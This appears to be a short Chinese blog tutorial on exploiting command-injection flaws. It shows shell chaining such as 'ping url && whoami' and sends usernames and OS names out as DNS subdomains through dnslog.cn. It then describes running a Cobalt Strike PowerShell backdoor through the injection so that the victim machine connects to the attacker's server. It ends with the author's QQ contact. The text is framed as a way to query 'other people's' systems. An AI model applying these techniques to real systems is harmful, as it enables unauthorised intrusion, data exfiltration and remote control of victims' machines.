首先先了解一下windows的shell命令连接符
还有命令执行的利用方式比如
&&
示例图
首先在dnslog.cn生成一个url 当然百度也可以 然后ping url &&whoami
可以发现不仅ping成功了也执行了我们的whoami命令 这里我电脑用户名是14219所有返回14219
linux可以用反引号来执行
同理在我命命令执行的漏洞中也可以这么使用
例如查看php的进程
同理也是在页面成功返回
也可以ping dnslog外带信息查询
使用windows的常量 例如查询查询用户名并用.当连接符
%USERNAME%
成功将我们的用户名当子域名导出
查询我们的系统是什么用
%OS%
上面是 命令执行查询他人系统服务的办法
接下来使用cobalt strike结合命令执行漏洞在电脑执行后门
首先先生成一个powershell一句话
将生成的powershell马使用&&连接符执行如图所示
最后执行成功上线我们的 cobalt strike
最后欢迎大佬们加我qq联系 3661629617